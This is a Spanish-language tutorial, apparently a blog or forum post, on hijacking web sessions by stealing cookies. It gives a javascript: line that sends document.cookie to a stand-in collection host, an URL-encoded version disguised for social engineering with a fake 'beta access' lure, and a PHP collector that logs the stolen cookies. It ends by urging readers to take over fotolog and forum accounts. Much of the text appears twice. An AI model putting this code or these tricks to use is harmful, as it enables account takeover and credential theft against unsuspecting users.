¿Qué sucede si tomo tus cookies, las uso desde mi navegador y entro a la web en cuestión?
Estaremos dentro de tú sesión para esa web.
¿Cómo hacerlo facilmente, sin mucho conocimiento?
Primero, necesitamos tomar las cookies del usuario en cuestión. El método más simple para lograrlo, es ni más ni menos que utilizar algo de ingeniería social (aunque bien se puede lograr de otro modo, que luego veremos):
javascript:window.location.href="http://tuWebDondeSeGuardaraLaCookie.com/?r=1&c="+document.location.href+"&cooKER="+document.cookie;
Lo que haría tal script, ejecutado desde la barra de direcciones de cualquier Firefox, IE... es abrir http://tuWebDondeSeGuardaraLaCookie.com y le pasará por GET['c'] la web donde se encontraba y por GET['cooKER'] las cookies que existan en el contexto de la web en cuestión.
Demasiado simple, ¿eh?
Ahora bien, tenemos el javascript para robarle la cookie, aunque este aún no es muy confiable para decirle a cualquiera: "Poné esto en xx.com y entrarás a la versión beta". Por lo cual, lo camuflaremos un poco, ¿cómo?
javascript:var X='TEXTO MENTIRA';window.location.href="%68%74%74%70%3A%2F%2F%74%75%57%65%62%44%6F%6E%64%65%53%65%47%75%61%72%64%61%72%61%4C%61%43%6F%6F%6B%69%65%2E%63%6F%6D%2F%3F%72%3D%31%26%63%3D"+document.location.href+"%26%63%6F%6F%4B%45%52%3D"+document.cookie;
De ese modo, con un html encode de la url y una variable cualquiera que diga un texto Y, parecerá más verosimil ;)
Ahora bien, sabemos como tomar sus cookies, veamos como guardarlas:
Tenemos el index.php y el archivo log.php, el segundo vacio, claro está:
Index.php:
if ($_GET['r'])
{
GuardaLOG ();
if (eregi(".", $_GET['c']))
{
header("Location: ". $_GET['c']);
}
else
{
header("Location: http://www.google.com");
}
exit(0);
}
if (!$_GET['jjj'] || $_GET['jjj'] <> "bla")
{
header("Location: http://www.google.com");
exit(0);
}
function Generalocoki()
{
$return = "Cookies: \n";
$cok = $_GET['cooKER'];
$_explodeCOK = @explode (";", $cok);
foreach ($_explodeCOK as $cookie)
{
$return .= $cookie ."\n";
}
return $return;
}
function GuardaLOG ()
{
$fecha = date("D M j G:i:s T Y");
$gestor = @fopen ("log.php", "a");
$cookies = Generalocoki();
@fwrite ($gestor, "Día: ". $fecha ."\n". $cookies ."Url: \n". $_GET['c'] ."\n \n");
@fclose($gestor);
}
//Muestra las cookies:
$archivo = file("log.php");
foreach ($archivo as $linea)
{
echo $linea ."\n";
}
?>
Estaremos dentro de tú sesión para esa web.
¿Cómo hacerlo facilmente, sin mucho conocimiento?
Primero, necesitamos tomar las cookies del usuario en cuestión. El método más simple para lograrlo, es ni más ni menos que utilizar algo de ingeniería social (aunque bien se puede lograr de otro modo, que luego veremos):
javascript:window.location.href="http://tuWebDondeSeGuardaraLaCookie.com/?r=1&c="+document.location.href+"&cooKER="+document.cookie;
Lo que haría tal script, ejecutado desde la barra de direcciones de cualquier Firefox, IE... es abrir http://tuWebDondeSeGuardaraLaCookie.com y le pasará por GET['c'] la web donde se encontraba y por GET['cooKER'] las cookies que existan en el contexto de la web en cuestión.
Demasiado simple, ¿eh?
Ahora bien, tenemos el javascript para robarle la cookie, aunque este aún no es muy confiable para decirle a cualquiera: "Poné esto en xx.com y entrarás a la versión beta". Por lo cual, lo camuflaremos un poco, ¿cómo?
javascript:var X='TEXTO MENTIRA';window.location.href="%68%74%74%70%3A%2F%2F%74%75%57%65%62%44%6F%6E%64%65%53%65%47%75%61%72%64%61%72%61%4C%61%43%6F%6F%6B%69%65%2E%63%6F%6D%2F%3F%72%3D%31%26%63%3D"+document.location.href+"%26%63%6F%6F%4B%45%52%3D"+document.cookie;
De ese modo, con un html encode de la url y una variable cualquiera que diga un texto Y, parecerá más verosimil ;)
Ahora bien, sabemos como tomar sus cookies, veamos como guardarlas:
Tenemos el index.php y el archivo log.php, el segundo vacio, claro está:
Index.php:
if ($_GET['r'])
{
GuardaLOG ();
if (eregi(".", $_GET['c']))
{
header("Location: ". $_GET['c']);
}
else
{
header("Location: http://www.google.com");
}
exit(0);
}
if (!$_GET['jjj'] || $_GET['jjj'] <> "bla")
{
header("Location: http://www.google.com");
exit(0);
}
function Generalocoki()
{
$return = "Cookies: \n";
$cok = $_GET['cooKER'];
$_explodeCOK = @explode (";", $cok);
foreach ($_explodeCOK as $cookie)
{
$return .= $cookie ."\n";
}
return $return;
}
function GuardaLOG ()
{
$fecha = date("D M j G:i:s T Y");
$gestor = @fopen ("log.php", "a");
$cookies = Generalocoki();
@fwrite ($gestor, "Día: ". $fecha ."\n". $cookies ."Url: \n". $_GET['c'] ."\n \n");
@fclose($gestor);
}
//Muestra las cookies:
$archivo = file("log.php");
foreach ($archivo as $linea)
{
echo $linea ."\n";
}
?>
Esto es más que suficiente para que puedas hacerte con cuentas de fotolog, foros, o lo que tu imaginación os diga ; )
Ahora bien, una vez obtenido los valores de las Cookies, procederemos a clonarlas en nuestro PC, ¿Cómo? Muy sencillamente, con el Cookie Editor.
Existen otros métodos, como insertarle el Javascript a alguna web que lo tome como tal... pero, allá tú.
¿Por qué Mozilla no ha tomado cartas en el asunto? Dios sabrá, mientras tanto gritemos fuerte, a ver si nos oyen.